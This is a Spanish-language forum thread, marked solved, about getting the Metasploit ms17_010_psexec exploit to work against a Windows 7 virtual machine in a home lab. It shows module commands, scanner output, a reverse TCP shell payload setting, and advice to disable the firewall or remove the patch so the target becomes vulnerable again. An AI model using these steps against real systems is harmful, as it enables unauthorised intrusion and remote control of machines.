[SOLUCIONADO] exploit ms17_010_psexec no funciona

Iniciado por redferne, Enero 02, 2020, 04:15:39 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Enero 02, 2020, 04:15:39 AM Ultima modificación: Enero 07, 2020, 08:46:29 AM por DtxdF
Saludos:
hasta hace poco en un w7 sp1 usaba el exploit:

use exploit/windows/smb/ms17_010_psexec
set rhost ip-victima
exploit

y conectaba, ahora no conecta pongo el error:

Código: text
[*] Started reverse TCP handler on 192.168.56.4:4444 
[*] 192.168.56.3:445 - Target OS: Windows 7 Ultimate 7600
[-] 192.168.56.3:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.


es una maquina virtual en vbox y el adaptador de red esta en solo anfitrion

se me olvidaba:

Código: text
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.56.3
rhost => 192.168.56.3
msf5 auxiliary(scanner/smb/smb_ms17_010) > set THREADS 11
THREADS => 11
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.56.3:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7600 x86 (32-bit)
[*] 192.168.56.3:445      - Scanned 1 of 1 hosts (100% complete)


Enero 02, 2020, 10:00:49 AM #1
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Desactiva el firewall de Windows y nos cuentas  ;)

~ DtxdF
PGP :: <D82F366940155CB043147178C4E075FC4403BDDC>

~ DtxdF
Enero 02, 2020, 11:53:53 AM #2
aunque desconecte el firewall sigo igual:

msf5 exploit(windows/smb/ms17_010_psexec) > exploit

  • Started reverse TCP handler on 192.168.56.4:4444
  • 192.168.56.3:445 - Target OS: Windows 7 Ultimate 7600
    [-] 192.168.56.3:445 - Unable to find accessible named pipe!
  • Exploit completed, but no session was created.
    msf5 exploit(windows/smb/ms17_010_psexec) >

Enero 02, 2020, 01:46:38 PM #3
hola!

se habrán cargado actualizaciones automáticas en tu windows?
Nivel 77 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Enero 02, 2020, 03:15:35 PM #4
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Verifica si ya tienes el parche instalado, sí lo tienes, quitalo.

Link que te puede ayudar: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

También puedes reinstalar Windows 7 (mucho más fácil si lo estás corriendo en una máquina virtual)

~ DtxdF
PGP :: <D82F366940155CB043147178C4E075FC4403BDDC>

~ DtxdF
Enero 06, 2020, 07:53:49 AM #5
Qué payload estás usando?

Prueba con:
Código: text
set payload windows/x64/shell_reverse_tcp


Un saludo.


Enero 06, 2020, 08:28:10 PM #6
Buenas.

A mi me paso algo parecido con un lab que monte hace poco para probar varias cve, en mi caso lo que pasaba es que cuando elegía el tipo de red (pública, doméstica o de trabajo) el Windows dejaba de ser vulnerable a ms17_010, comprueba que no te haya pasado lo mismo que a mí, en mi caso dejaba la opción por defecto.

Un saludo.
Un mundo construido sobre fantasía. Emociones sintéticas en forma de pastillas. Guerras psicológicas en forma de publicidad. Sustancias químicas que alteran la mente en forma de comida. Lavados de cerebro en forma de medios de comunicación. Agujas aisladas bajo control en forma de redes sociales.
Enero 07, 2020, 04:25:50 AM #7
he reinstalado y vuelve a ser vulnerable.
gracias a tod@s
Imprimir
Ir Arriba Páginas1
Acciones del Usuario